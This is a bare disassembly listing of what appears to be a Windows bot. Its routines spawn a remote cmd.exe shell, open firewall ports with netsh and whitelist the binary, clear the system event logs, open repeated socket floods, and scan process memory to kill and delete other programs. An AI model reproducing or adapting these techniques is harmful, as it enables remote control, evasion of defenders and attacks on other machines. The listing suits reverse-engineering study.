mov dword_4586E0, eax
call sub_41E4D1
xor esi, esi
lea eax, [ebp+var_174]
push esi
push eax
push 104h
mov edi, offset aCmd_exe ; "cmd.exe"
push esi
push edi
push esi
call dword_457000 ; SearchPathA
test eax, eax
jz loc_41E7F8
lea eax, [ebp+var_18]
mov ebx, dword_4370FC
push esi
push eax
lea eax, [ebp+var_8]
mov [ebp+var_18], 0Ch
push eax
lea eax, [ebp+var_C]
push eax
mov [ebp+var_10], 1
mov [ebp+var_14], esi
call ebx ; dword_4370FC
test eax, eax
jz loc_41E7F8
lea eax, [ebp+var_18]
push esi
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push eax
call ebx ; dword_4370FC
test eax, eax
jz short loc_41E7F8
mov ebx, dword_43704C
push 3
push esi
push esi
push offset dword_4586D8
call ebx ; dword_43704C
push eax
push [ebp+var_4]
call ebx ; dword_43704C
push eax
call dword_4370F8 ; DuplicateHandle
test eax, eax
jz short loc_41E7F8
push 10h
lea eax, [ebp+var_28]
push esi
push eax
call sub_429690
push 44h
lea eax, [ebp+var_70]
pop ebx
push ebx
push esi
push eax
call sub_429690
mov eax, [ebp+arg_4]
add esp, 18h
mov [ebp+var_38], eax
mov eax, [ebp+var_8]
mov [ebp+var_34], eax
mov [ebp+var_30], eax
lea eax, [ebp+var_28]
mov [ebp+var_70], ebx
push eax
lea eax, [ebp+var_70]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
lea eax, [ebp+var_174]
push edi
push eax
mov [ebp+var_44], 101h
mov [ebp+var_40], si
call dword_437188 ; CreateProcessA
test eax, eax
jnz short loc_41E800
loc_41E7F8: ; CODE XREF: sub_41E6F8+3C�j
; sub_41E6F8+6A�j ...
or eax, 0FFFFFFFFh
jmp loc_41E8A4
; ---------------------------------------------------------------------------
loc_41E800: ; CODE XREF: sub_41E6F8+FE�j
push [ebp+arg_4]
mov edi, dword_437044
call edi ; dword_437044
mov eax, [ebp+var_C]
push [ebp+var_24]
mov dword_4586D4, eax
mov eax, [ebp+var_4]
mov dword_4586DC, eax
mov eax, [ebp+var_28]
mov dword_4586D0, eax
call edi ; dword_437044
cmp [ebp+arg_0], esi
jz short loc_41E832
push [ebp+arg_0]
jmp short loc_41E837
; ---------------------------------------------------------------------------
loc_41E832: ; CODE XREF: sub_41E6F8+133�j
push offset byte_454A34
loc_41E837: ; CODE XREF: sub_41E6F8+138�j
push offset dword_4586F4
call sub_429A33
pop ecx
mov ebx, offset aWhdag1glagf_ ; "WHdAg1glAgf."
pop ecx
push ebx
push offset aSCmdPrompt ; "%s CMD Prompt"
push 0Fh
call sub_4233DE
mov edi, eax
mov ecx, [ebp+var_20]
imul edi, 2724h
add esp, 0Ch
mov dword_46D708[edi], ecx
lea ecx, [ebp+var_2C]
push ecx
push esi
push eax
push offset sub_41E59B
push esi
push esi
call dword_43717C ; CreateThread
cmp eax, esi
mov dword_46D70C[edi], eax
jnz short loc_41E8A2
call dword_43716C ; RtlGetLastWin32Error
push eax
push ebx
lea eax, [ebp+var_2884]
push offset aSFailedToStart ; "%s Failed to start IO thread, error: <%"...
push eax
call sub_429A33
add esp, 10h
loc_41E8A2: ; CODE XREF: sub_41E6F8+18C�j
xor eax, eax
loc_41E8A4: ; CODE XREF: sub_41E6F8+103�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E6F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E8A9 proc near ; CODE XREF: sub_418EDB+535�p
var_404 = byte ptr -404h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
mov esi, offset dword_443990
push edi
lea eax, [ebp+var_404]
push esi
push eax
call dword_4370A4 ; lstrcpyA
lea eax, [ebp+var_404]
push offset aEnabled ; ":*:Enabled:"
push eax
call sub_42A510
lea eax, [ebp+var_404]
push offset aSystem_0 ; "SYSTEM"
push eax
call sub_42A510
mov edi, dword_437004
add esp, 10h
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push 0
push offset aSystemCurren_4 ; "SYSTEM\\CurrentControlSet\\Services\\Share"...
push 80000002h
call edi ; dword_437004
lea eax, [ebp+var_404]
push eax
call sub_4292D0
pop ecx
mov ebx, dword_437008
push eax
lea eax, [ebp+var_404]
push eax
push 1
push 0
push esi
push [ebp+var_4]
call ebx ; dword_437008
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push 0
push offset aSystemCurren_5 ; "SYSTEM\\CurrentControlSet\\Services\\Share"...
push 80000002h
call edi ; dword_437004
lea eax, [ebp+var_404]
push eax
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_404]
push eax
push 1
push 0
push esi
push [ebp+var_4]
call ebx ; dword_437008
pop edi
pop esi
pop ebx
leave
retn
sub_41E8A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_41E96A proc near ; DATA XREF: sub_418EDB+541�o
var_A0 = byte ptr -0A0h
var_88 = byte ptr -88h
var_78 = byte ptr -78h
arg_D0 = byte ptr 0D4h
arg_2B8 = byte ptr 2BCh
arg_4A0 = byte ptr 4A4h
arg_700 = byte ptr 704h
arg_8E8 = byte ptr 8ECh
arg_A78 = byte ptr 0A7Ch
arg_E60 = byte ptr 0E64h
mov eax, 1304h
call sub_429A90
push ebx
push ebp
push esi
push edi
push offset aFirewallSetP_0 ; "firewall set portopening TCP 445 NB"
lea eax, [esp+14h+arg_700]
push 200h
push eax
call sub_429AEE
add esp, 0Ch
mov esi, dword_43725C
xor ebp, ebp
lea eax, [esp+10h+arg_700]
push ebp
push ebp
mov ebx, offset aNetsh ; "netsh"
push eax
mov edi, offset aOpen ; "open"
push ebx
push edi
push ebp
call esi ; dword_43725C
push offset aFirewallSetP_1 ; "firewall set portopening TCP 139 NB"
lea eax, [esp+2Ch+arg_8E8]
push 200h
push eax
call sub_429AEE
add esp, 0Ch
lea eax, [esp+28h+arg_8E8]
push ebp
push ebp
push eax
push ebx
push edi
push ebp
call esi ; dword_43725C
push offset aFirewallSetP_2 ; "firewall set portopening TCP 1013 BS"
lea eax, [esp+44h+arg_D0]
push 200h
push eax
call sub_429AEE
add esp, 0Ch
lea eax, [esp+40h+arg_D0]
push ebp
push ebp
push eax
push ebx
push edi
push ebp
call esi ; dword_43725C
push offset aFirewallSetP_3 ; "firewall set portopening TCP 9999 PORT1"...
lea eax, [esp+5Ch+arg_2B8]
push 200h
push eax
call sub_429AEE
add esp, 0Ch
lea eax, [esp+58h+arg_2B8]
push ebp
push ebp
push eax
push ebx
push edi
push ebp
call esi ; dword_43725C
push offset aFirewallSetP_4 ; "firewall set portopening TCP 9991 PORT2"...
lea eax, [esp+74h+arg_4A0]
push 200h
push eax
call sub_429AEE
add esp, 0Ch
lea eax, [esp+70h+arg_4A0]
push ebp
push ebp
push eax
push ebx
push edi
push ebp
call esi ; dword_43725C
push 104h
lea eax, [esp+8Ch+var_78]
push eax
push ebp
call dword_437070 ; GetModuleHandleA
push eax
call dword_437178 ; GetModuleFileNameA
lea eax, [esp+98h+var_88]
push eax
push offset aFirewallAddAll ; "firewall add allowedprogram \"%s\" workst"...
lea eax, [esp+0A0h+arg_A78]
push 400h
push eax
call sub_429AEE
add esp, 10h
lea eax, [esp+98h+arg_A78]
push ebp
push ebp
push eax
push ebx
push edi
push ebp
call esi ; dword_43725C
lea eax, [esp+0B0h+var_A0]
push eax
push offset aFirewallSetAll ; "firewall set allowedprogram \"%s\" workst"...
lea eax, [esp+0B8h+arg_E60]
push 400h
push eax
call sub_429AEE
add esp, 10h
lea eax, [esp+0B0h+arg_E60]
push ebp
push ebp
push eax
push ebx
push edi
push ebp
call esi ; dword_43725C
push ebp
call dword_437170 ; ExitThread
pop edi
pop esi
pop ebp
pop ebx
sub_41E96A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_41EAD6 proc near ; DATA XREF: sub_402CBA+3F�o
var_200 = byte ptr -200h
push ebp
mov ebp, esp
sub esp, 200h
push dword_454A10
lea eax, [ebp+var_200]
push offset aFirewallSetPor ; "firewall set portopening TCP %d FD"
push 200h
push eax
call sub_429AEE
add esp, 10h
lea eax, [ebp+var_200]
push 0
push 0
push eax
push offset aNetsh ; "netsh"
push offset aOpen ; "open"
push 0
call dword_43725C
push 0
call dword_437170 ; ExitThread
sub_41EAD6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_41EB23 proc near ; DATA XREF: sub_40A938+1C6C�o
; sub_418EDB+21A�o
var_A0 = dword ptr -0A0h
var_90 = dword ptr -90h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A0h
mov eax, [ebp+arg_0]
push ebx
push edi
mov [ebp+var_C], offset aApplication ; "application"
mov dword ptr [eax+0BCh], 1
mov [ebp+var_8], offset aSecurity ; "security"
mov [ebp+var_4], offset aSystem ; "system"
loc_41EB50: ; CODE XREF: sub_41EB23+AF�j
call dword_456DF4 ; DnsFlushResolverCache
call sub_427E13
xor edi, edi
push 94h
lea eax, [ebp+var_A0]
push edi
push eax
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_A0]
mov [ebp+var_A0], 94h
push eax
call dword_437050 ; GetVersionExA
cmp [ebp+var_90], 2
jnz short loc_41EBBA
loc_41EB92: ; CODE XREF: sub_41EB23+95�j
push [ebp+edi*4+var_C]
push 0
call dword_456E70 ; OpenEventLogA
mov ebx, eax
test ebx, ebx
jz short loc_41EBB4
push 0
push ebx
call dword_456E80 ; ClearEventLogA
push ebx
call dword_456E2C ; CloseEventLog
loc_41EBB4: ; CODE XREF: sub_41EB23+7F�j
inc edi
cmp edi, 3
jl short loc_41EB92
loc_41EBBA: ; CODE XREF: sub_41EB23+6D�j
push 4F27AC0h
push 32A3DE0h
call sub_41E34F
pop ecx
pop ecx
push eax
call dword_43718C ; Sleep
jmp loc_41EB50
sub_41EB23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EBD7 proc near ; DATA XREF: sub_40A938+76DE�o
var_9D64 = word ptr -9D64h
var_9D62 = word ptr -9D62h
var_9D60 = dword ptr -9D60h
var_124 = dword ptr -124h
var_120 = byte ptr -120h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 9D64h
call sub_429A90
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 48h
mov esi, eax
pop ecx
lea edi, [ebp+var_124]
rep movsd
xor edi, edi
xor ebx, ebx
inc edi
cmp [ebp+var_14], ebx
mov [eax+11Ch], edi
mov eax, [ebp+var_124]
mov [ebp+var_4], eax
mov dword_458728, ebx
jle loc_41ED3C
loc_41EC1A: ; CODE XREF: sub_41EBD7+10B�j
push ebx
push edi
push 2
call dword_4372B8 ; socket
mov ecx, dword_458728
cmp eax, ebx
mov dword_458730[ecx*4], eax
jl loc_41ECCB
shl ecx, 4
push ebx
push 10h
lea eax, [ebp+ecx+var_9D64]
push eax
call sub_429690
mov eax, dword_458728
add esp, 0Ch
shl eax, 4
mov [ebp+eax+var_9D64], 2
lea eax, [ebp+var_120]
push eax
call dword_4372BC ; inet_addr
mov ecx, dword_458728
push [ebp+var_1C]
mov edx, ecx
shl edx, 4
shl ecx, 4
mov [ebp+edx+var_9D60], eax
mov esi, ecx
call dword_4372C0 ; ntohs
mov [ebp+esi+var_9D62], ax
lea eax, [ebp+esi+var_9D64]
push 10h
push eax
mov eax, dword_458728
push dword_458730[eax*4]
call dword_4372C8 ; connect
lea eax, [ebp+arg_0+2]
push edi
push eax
mov eax, dword_458728
push dword_458730[eax*4]
call sub_42F3EE
add esp, 0Ch
loc_41ECCB: ; CODE XREF: sub_41EBD7+5C�j
push [ebp+var_18]
call dword_43718C ; Sleep
inc dword_458728
mov eax, dword_458728
cmp eax, [ebp+var_14]
jl loc_41EC1A
jmp short loc_41ED3C
; ---------------------------------------------------------------------------
loc_41ECEA: ; CODE XREF: sub_41EBD7+170�j
push 2
push dword_458730[eax*4]
call dword_437284 ; shutdown
test eax, eax
jge short loc_41ED08
push offset aShutdown ; "shutdown"
call sub_42BE29
pop ecx
loc_41ED08: ; CODE XREF: sub_41EBD7+124�j
mov eax, dword_458728
push dword_458730[eax*4]
call sub_42F0D0
test eax, eax
pop ecx
jz short loc_41ED2A
push offset aCloseError ; "close error\n"
call sub_42BDE8
jmp short loc_41ED3B
; ---------------------------------------------------------------------------
loc_41ED2A: ; CODE XREF: sub_41EBD7+145�j
push dword_458728
push offset aClosedI ; "closed %i\n"
call sub_42BDE8
pop ecx
loc_41ED3B: ; CODE XREF: sub_41EBD7+151�j
pop ecx
loc_41ED3C: ; CODE XREF: sub_41EBD7+3D�j
; sub_41EBD7+111�j
dec dword_458728
mov eax, dword_458728
jns short loc_41ECEA
push dword_458730[eax*4]
call dword_4372D4 ; closesocket
cmp [ebp+var_C], 0
mov ebx, offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
mov edi, offset aAxauo_rlggx0 ; "aXauo.rLGgX0"
mov esi, offset aSSS_2 ; "%s %s -> %s"
jnz short loc_41ED8D
cmp [ebp+var_10], 0
jnz short loc_41ED93
lea eax, [ebp+var_120]
push eax
push ebx
push edi
lea eax, [ebp+var_A0]
push esi
push eax
push [ebp+var_4]
call sub_41CD84
add esp, 18h
loc_41ED8D: ; CODE XREF: sub_41EBD7+192�j
cmp [ebp+var_10], 0
jz short loc_41EDAF
loc_41ED93: ; CODE XREF: sub_41EBD7+198�j
lea eax, [ebp+var_120]
push eax
push ebx
push edi
lea eax, [ebp+var_A0]
push esi
push eax
push [ebp+var_4]
call sub_41CD0E
add esp, 18h
loc_41EDAF: ; CODE XREF: sub_41EBD7+1BA�j
push [ebp+var_20]
call sub_42355A
pop ecx
push 0
call dword_437170 ; ExitThread
pop edi
pop esi
pop ebx
sub_41EBD7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EDC3 proc near ; CODE XREF: sub_41F02F+353�p
; sub_41F02F+385�p
var_5504 = byte ptr -5504h
var_5503 = byte ptr -5503h
var_504 = byte ptr -504h
var_503 = byte ptr -503h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = byte ptr 20h
arg_20 = dword ptr 28h
arg_3C = byte ptr 44h
push ebp
mov ebp, esp
mov eax, 5504h
call sub_429A90
and [ebp+var_5504], 0
push ebx
push esi
push edi
mov ecx, 13FFh
xor eax, eax
lea edi, [ebp+var_5503]
and [ebp+var_504], 0
rep stosd
stosw
stosb
mov ecx, 13Fh
xor eax, eax
lea edi, [ebp+var_503]
push [ebp+arg_20]
rep stosd
stosw
stosb
xor edi, edi
push edi
push 1F0FFFh
call dword_437104 ; OpenProcess
mov [ebp+var_4], eax
mov eax, [ebp+arg_10]
mov [ebp+arg_10], eax
jmp loc_41EF12
; ---------------------------------------------------------------------------
loc_41EE24: ; CODE XREF: sub_41EDC3+152�j
push edi
lea eax, [ebp+var_504]
push 500h
push eax
push [ebp+arg_10]
push [ebp+var_4]
call dword_437100 ; ReadProcessMemory
cmp eax, edi
jz loc_41EF1B
lea eax, [ebp+var_504]
push eax
lea eax, [ebp+var_5504]
push eax
call sub_42A510
cmp off_447ACC, edi
pop ecx
pop ecx
jz loc_41EEF7
mov esi, offset off_447ACC
mov ebx, esi
loc_41EE6D: ; CODE XREF: sub_41EDC3+12E�j
push dword ptr [esi]
lea eax, [ebp+var_5504]
push eax
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_41EEEA
push dword ptr [ebx-4]
lea eax, [ebp+arg_3C]
push eax
push dword ptr [esi]
mov esi, offset dword_45AE40
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
push offset aSFoundStringSI ; "%s Found string \"%s\" in \"%s\" File \"%s\""
push esi
call sub_429A33
add esp, 18h
cmp [ebp+arg_4], edi
jnz short loc_41EEB6
push esi
push [ebp+arg_C]
push [ebp+arg_0]
call sub_41CD84
add esp, 0Ch
loc_41EEB6: ; CODE XREF: sub_41EDC3+E2�j
push 7D0h
call dword_43718C ; Sleep
sub esp, 128h
lea esi, [ebp+arg_18]
push 4Ah
pop ecx
mov edi, esp
push [ebp+arg_C]
rep movsd
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41EF29
add esp, 138h
xor edi, edi
loc_41EEEA: ; CODE XREF: sub_41EDC3+BC�j
add ebx, 8
mov esi, ebx
cmp [ebx], edi
jnz loc_41EE6D
loc_41EEF7: ; CODE XREF: sub_41EDC3+9D�j
push 5000h
lea eax, [ebp+var_5504]
push edi
push eax
call sub_429690
add esp, 0Ch
inc [ebp+arg_10]
mov eax, [ebp+arg_10]
loc_41EF12: ; CODE XREF: sub_41EDC3+5C�j
cmp eax, [ebp+arg_14]
jbe loc_41EE24
loc_41EF1B: ; CODE XREF: sub_41EDC3+7C�j
push [ebp+var_4]
call dword_437044 ; CloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_41EDC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EF29 proc near ; CODE XREF: sub_41EDC3+11A�p
; sub_41F02F+25F�p ...
var_228 = dword ptr -228h
var_224 = byte ptr -224h
var_208 = byte ptr -208h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_34 = byte ptr 3Ch
push ebp
mov ebp, esp
sub esp, 228h
and [ebp+var_228], 0
push esi
push edi
mov ecx, 88h
push [ebp+arg_18]
xor eax, eax
lea edi, [ebp+var_224]
rep stosd
push 8
call sub_428FE2 ; CreateToolhelp32Snapshot
mov edi, eax
lea eax, [ebp+var_228]
push eax
push edi
mov [ebp+var_228], 224h
call sub_428FDC ; Module32First
test eax, eax
jz loc_41F01D
mov esi, offset dword_45AE40
loc_41EF7A: ; CODE XREF: sub_41EF29+EE�j
lea eax, [ebp+var_208]
push eax
lea eax, [ebp+arg_34]
push eax
call dword_437174 ; lstrcmpiA
test eax, eax
jnz short loc_41F008
lea eax, [ebp+var_108]
push 80h
push eax
call dword_437068 ; SetFileAttributesA
push [ebp+arg_18]
push 0
push 1F0FFFh
call dword_437104 ; OpenProcess
push 0
push eax
mov [ebp+var_4], eax
call dword_43710C ; TerminateProcess
push 1F4h
call dword_43718C ; Sleep
lea eax, [ebp+var_108]
push eax
call dword_437060 ; DeleteFileA
test eax, eax
jz short loc_41F008
lea eax, [ebp+var_108]
push eax
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
push offset aSTerminatedAnd ; "%s Terminated and deleted %s"
push esi
call sub_429A33
add esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_41F008
push esi
push [ebp+arg_C]
push [ebp+arg_0]
call sub_41CD84
add esp, 0Ch
loc_41F008: ; CODE XREF: sub_41EF29+64�j
; sub_41EF29+AE�j ...
lea eax, [ebp+var_228]
push eax
push edi
call sub_428FD6 ; Module32Next
test eax, eax
jnz loc_41EF7A
loc_41F01D: ; CODE XREF: sub_41EF29+46�j
push [ebp+var_4]
mov esi, dword_437044
call esi ; dword_437044
push edi
call esi ; dword_437044
pop edi
pop esi
leave
retn
sub_41EF29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F02F proc near ; DATA XREF: sub_40A938+1DDB�o
var_260 = byte ptr -260h
var_1D5 = byte ptr -1D5h
var_1D4 = dword ptr -1D4h
var_1B0 = byte ptr -1B0h
var_AC = dword ptr -0ACh
var_A8 = byte ptr -0A8h
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 260h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 27h
mov esi, eax
pop ecx
lea edi, [ebp+var_AC]
rep movsd
mov esi, offset dword_45AF40
mov dword ptr [eax+98h], 1
mov eax, [ebp+var_AC]
push 80h
push esi
push 0
mov [ebp+var_8], eax
call dword_437070 ; GetModuleHandleA
push eax
call dword_437178 ; GetModuleFileNameA
push 5Ch
push esi
call sub_42AF90
push offset byte_454A34
push offset asc_44DA9C ; "\\"
push eax
mov dword_45AFC0, eax
call sub_427931
add esp, 14h
push 0
push 2
call sub_428FE2 ; CreateToolhelp32Snapshot
lea ecx, [ebp+var_1D4]
mov [ebp+var_C], eax
push ecx
push eax
mov [ebp+var_1D4], 128h
mov byte ptr [ebp+arg_0+3], 1
call sub_428FEE ; Process32First
jmp loc_41F3D4
; ---------------------------------------------------------------------------
loc_41F0C4: ; CODE XREF: sub_41F02F+3A7�j
push dword_45AFC0
lea eax, [ebp+var_1B0]
push eax
call dword_437174 ; lstrcmpiA
test eax, eax
jnz short loc_41F0DE
and byte ptr [ebp+arg_0+3], al
loc_41F0DE: ; CODE XREF: sub_41F02F+AA�j
and [ebp+var_1D5], 0
mov eax, 600h
push eax
mov [ebp+var_10], eax
call sub_4296E8
pop ecx
mov esi, eax
lea eax, [ebp+var_10]
push 1
xor ebx, ebx
push eax
push esi
mov [esi], ebx
call sub_429000 ; GetUdpTable
cmp [esi], ebx
jle short loc_41F143
lea edi, [esi+8]
loc_41F10D: ; CODE XREF: sub_41F02F+112�j
mov ax, [edi]
push eax
call dword_4372A4 ; ntohs
mov [ebp+var_4], eax
push 8Ch
lea eax, [ebp+var_260]
push 0
push eax
call sub_429690
add esp, 0Ch
cmp word ptr [ebp+var_4], 45h
jz loc_41F3FB
inc ebx
add edi, 8
cmp ebx, [esi]
jl short loc_41F10D
loc_41F143: ; CODE XREF: sub_41F02F+D9�j
push esi
call sub_429822
pop ecx
xor edi, edi
push edi
push 45h
push offset dword_457CD8
call dword_456F5C ; inet_addr
push eax
call sub_40238D
add esp, 0Ch
test eax, eax
jnz loc_41F435
loc_41F16B: ; CODE XREF: sub_41F02F+17B�j
mov ebx, dword_437174
lea esi, off_4488F8[edi]
lea eax, [ebp+var_1B0]
push dword ptr [esi]
push eax
call ebx ; dword_437174
test eax, eax
jnz short loc_41F189
and byte ptr [ebp+arg_0+3], al
loc_41F189: ; CODE XREF: sub_41F02F+155�j
lea eax, [ebp+var_1B0]
push eax
push dword ptr [esi]
call sub_427A85
pop ecx
test eax, eax
pop ecx
jz short loc_41F1A1
and byte ptr [ebp+arg_0+3], 0
loc_41F1A1: ; CODE XREF: sub_41F02F+16C�j
add edi, 4
cmp edi, 668h
jb short loc_41F16B
xor edi, edi
loc_41F1AE: ; CODE XREF: sub_41F02F+1B8�j
lea esi, off_448F60[edi]
lea eax, [ebp+var_1B0]
push dword ptr [esi]
push eax
call ebx ; dword_437174
test eax, eax
jnz short loc_41F1C6
and byte ptr [ebp+arg_0+3], al
loc_41F1C6: ; CODE XREF: sub_41F02F+192�j
lea eax, [ebp+var_1B0]
push eax
push dword ptr [esi]
call sub_427A85
pop ecx
test eax, eax
pop ecx
jz short loc_41F1DE
and byte ptr [ebp+arg_0+3], 0
loc_41F1DE: ; CODE XREF: sub_41F02F+1A9�j
add edi, 4
cmp edi, 88h
jb short loc_41F1AE
xor edi, edi
loc_41F1EB: ; CODE XREF: sub_41F02F+1F5�j
lea esi, off_448FE8[edi]
lea eax, [ebp+var_1B0]
push dword ptr [esi]
push eax
call ebx ; dword_437174
test eax, eax
jnz short loc_41F203
and byte ptr [ebp+arg_0+3], al
loc_41F203: ; CODE XREF: sub_41F02F+1CF�j
lea eax, [ebp+var_1B0]
push eax
push dword ptr [esi]
call sub_427A85
pop ecx
test eax, eax
pop ecx
jz short loc_41F21B
and byte ptr [ebp+arg_0+3], 0
loc_41F21B: ; CODE XREF: sub_41F02F+1E6�j
add edi, 4
cmp edi, 0D0h
jb short loc_41F1EB
and [ebp+var_4], 0
loc_41F22A: ; CODE XREF: sub_41F02F+2EA�j
mov eax, [ebp+var_4]
push off_447E48[eax]
lea eax, [ebp+var_1B0]
push eax
call ebx ; dword_437174
test eax, eax
jnz short loc_41F299
cmp [ebp+var_18], eax
jz short loc_41F268
lea eax, [ebp+var_1B0]
push eax
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
lea eax, [ebp+var_A8]
push offset aSKillingS ; "%s Killing %s"
push eax
push [ebp+var_8]
call sub_41CD84
add esp, 14h
loc_41F268: ; CODE XREF: sub_41F02F+214�j
sub esp, 128h
lea eax, [ebp+var_A8]
lea esi, [ebp+var_1D4]
push 4Ah
pop ecx
mov edi, esp
push eax
push [ebp+var_18]
rep movsd
push [ebp+var_20]
push [ebp+var_AC]
call sub_41EF29
add esp, 138h
loc_41F299: ; CODE XREF: sub_41F02F+20F�j
lea eax, [ebp+var_1B0]
push eax
mov eax, [ebp+var_4]
push off_447E48[eax]
call sub_427A85
pop ecx
test eax, eax
pop ecx
jz short loc_41F30E
cmp [ebp+var_18], 0
jz short loc_41F2DD
lea eax, [ebp+var_1B0]
push eax
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
lea eax, [ebp+var_A8]
push offset aSMatchedAndKil ; "%s Matched and killing %s"
push eax
push [ebp+var_8]
call sub_41CD84
add esp, 14h
loc_41F2DD: ; CODE XREF: sub_41F02F+289�j
sub esp, 128h
lea eax, [ebp+var_A8]
lea esi, [ebp+var_1D4]
push 4Ah
pop ecx
mov edi, esp
push eax
push [ebp+var_18]
rep movsd
push [ebp+var_20]
push [ebp+var_AC]
call sub_41EF29
add esp, 138h
loc_41F30E: ; CODE XREF: sub_41F02F+283�j
add [ebp+var_4], 4
cmp [ebp+var_4], 0AACh
jb loc_41F22A
cmp byte ptr [ebp+arg_0+3], 0
jz loc_41F3C1
cmp [ebp+var_18], 0
jz short loc_41F352
lea eax, [ebp+var_1B0]
push eax
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
lea eax, [ebp+var_A8]
push offset aSRunningAvscan ; "%s Running AVScan on %s"
push eax
push [ebp+var_8]
call sub_41CD84
add esp, 14h
loc_41F352: ; CODE XREF: sub_41F02F+2FE�j
sub esp, 128h
lea eax, [ebp+var_A8]
lea esi, [ebp+var_1D4]
push 4Ah
pop ecx
mov edi, esp
push offset byte_4FFFFF
push 400000h
push eax
push [ebp+var_18]
rep movsd
push [ebp+var_20]
push [ebp+var_AC]
call sub_41EDC3
add esp, 18h
lea eax, [ebp+var_A8]
lea esi, [ebp+var_1D4]
push 4Ah
pop ecx
mov edi, esp
push 1FFFFFh
push 100000h
push eax
push [ebp+var_18]
rep movsd
push [ebp+var_20]
push [ebp+var_AC]
call sub_41EDC3
add esp, 140h
jmp short loc_41F3C5
; ---------------------------------------------------------------------------
loc_41F3C1: ; CODE XREF: sub_41F02F+2F4�j
mov byte ptr [ebp+arg_0+3], 1
loc_41F3C5: ; CODE XREF: sub_41F02F+390�j
lea eax, [ebp+var_1D4]
push eax
push [ebp+var_C]
call sub_428FE8 ; Process32Next
loc_41F3D4: ; CODE XREF: sub_41F02F+90�j
test eax, eax
jnz loc_41F0C4
push [ebp+var_C]
call dword_437044 ; CloseHandle
call sub_42BEC0
push [ebp+var_28]
call sub_42355A
pop ecx
push 0
call dword_437170 ; ExitThread
loc_41F3FB: ; CODE XREF: sub_41F02F+106�j
cmp [ebp+var_18], 0
jz short loc_41F424
lea eax, [ebp+var_1B0]
push eax
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
lea eax, [ebp+var_A8]
push offset aSBkillShutdown ; "%s bkill shutdown for wride."
push eax
push [ebp+var_8]
call sub_41CD84
add esp, 14h
loc_41F424: ; CODE XREF: sub_41F02F+3D0�j
push [ebp+var_28]
call sub_42355A
pop ecx
push 0
call dword_437170 ; ExitThread
loc_41F435: ; CODE XREF: sub_41F02F+136�j
cmp [ebp+var_18], edi
jz short loc_41F45D
lea eax, [ebp+var_1B0]
push eax
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
lea eax, [ebp+var_A8]
push offset aSBkillShutdown ; "%s bkill shutdown for wride."
push eax
push [ebp+var_8]
call sub_41CD84
add esp, 14h
loc_41F45D: ; CODE XREF: sub_41F02F+409�j
push [ebp+var_28]
call sub_42355A
pop ecx
push edi
call dword_437170 ; ExitThread
sub_41F02F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F46D proc near ; DATA XREF: sub_40A938+210E�o
var_418 = byte ptr -418h
var_314 = byte ptr -314h
var_29C = byte ptr -29Ch
var_198 = byte ptr -198h
var_120 = dword ptr -120h
var_F4 = dword ptr -0F4h
var_F0 = word ptr -0F0h
var_DC = dword ptr -0DCh
var_D8 = byte ptr -0D8h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 418h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [ebp+var_DC]
rep movsd
xor edi, edi
push [ebp+var_54]
inc edi
mov esi, [ebp+var_48]
mov [eax+0BCh], edi
mov eax, [ebp+var_DC]
